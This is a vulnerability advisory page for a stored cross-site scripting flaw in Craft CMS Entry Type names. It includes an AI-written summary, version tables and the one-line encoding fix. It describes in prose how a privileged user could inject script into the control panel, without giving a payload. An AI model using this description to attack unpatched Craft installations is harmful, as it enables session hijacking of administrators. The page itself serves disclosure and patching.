Craft has a Stored XSS in Entry Types Name
Description
Craft is a platform for creating digital experiences. From 5.0.0-RC1 to 5.8.21, Craft has a stored XSS via Entry Type names. The name is not sanitized when displayed in the Entry Types list. This vulnerability is fixed in 5.8.22.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Craft CMS 5.0.0-RC1 through 5.8.21 contains a stored XSS vulnerability in Entry Type names, fixed in 5.8.22 by sanitizing output.
Craft CMS versions 5.0.0-RC1 through 5.8.21 are affected by a stored cross-site scripting (XSS) vulnerability in the Entry Type name field. The name is not sanitized when displayed in the Entry Types list within the control panel, allowing an attacker to inject arbitrary JavaScript that executes in the context of other users' browsers [1]. The root cause is the lack of output encoding; the fix in commit cfd6ba0 applies Html::encode() to the label before rendering [4].
To exploit this vulnerability, an attacker must have the ability to create or edit Entry Types—typically a user with administrative or content management privileges. When the malicious name is saved, any user who views the Entry Types list (including other administrators) will trigger the injected script. No additional authentication bypass is required, but the attacker must have a valid account with sufficient permissions [1][2].
Successful exploitation allows the attacker to execute arbitrary JavaScript in the victim's browser within the Craft control panel session. This can lead to session hijacking, unauthorized actions performed on behalf of the victim, data exfiltration, or defacement of the admin interface. The impact is limited to the control panel context, but given the elevated privileges of typical viewers, the risk is significant [1].
The vulnerability is fixed in Craft CMS version 5.8.22, released on 2026-02-09 [2]. Users running any affected version (5.0.0-RC1 through 5.8.21) should upgrade immediately. No workarounds are documented; the only mitigation is applying the patch [4].
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
craftcms/cmsPackagist | >= 5.0.0-RC1, < 5.8.22 | 5.8.22 |
Affected products
2Patches
12 files changed · +2 −1
CHANGELOG.md+1 −0 modified@@ -14,6 +14,7 @@ - Fixed a bug where object templates that included another template were missing variables. ([#18165](https://github.com/craftcms/cms/issues/18165)) - Fixed a JavaScript error that could occur if two control panel animations were triggered simultaneously. - Fixed a bug where it wasn’t possible to copy/paste nested entries within Matrix fields set to the inline-editable blocks view mode, for unpublished owner elements. ([#18185](https://github.com/craftcms/cms/pull/18185)) +- Fixed an XSS vulnerability. (GHSA-7pr4-wx9w-mqwr) ## 5.8.21 - 2025-12-04
src/services/Entries.php+1 −1 modified@@ -1961,7 +1961,7 @@ public function getTableData( $usages = $this->allEntryTypeUsages(); foreach ($entryTypes as $entryType) { - $label = $entryType->getUiLabel(); + $label = Html::encode($entryType->getUiLabel()); $chipCellContent = Html::beginTag('div', ['class' => 'inline-chips']) . Cp::chipHtml($entryType, [ 'labelHtml' => Html::a($label, $entryType->getCpEditUrl(), [
Vulnerability mechanics
Generated by null/stub on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5- github.com/advisories/GHSA-7pr4-wx9w-mqwrghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2026-25491ghsaADVISORY
- github.com/craftcms/cms/commit/cfd6ba0e2ce1a59a02d75cae6558c4ace1ab8bd4ghsax_refsource_MISCWEB
- github.com/craftcms/cms/releases/tag/5.8.22ghsax_refsource_MISCWEB
- github.com/craftcms/cms/security/advisories/GHSA-7pr4-wx9w-mqwrghsax_refsource_CONFIRMWEB
News mentions
0No linked articles in our index yet.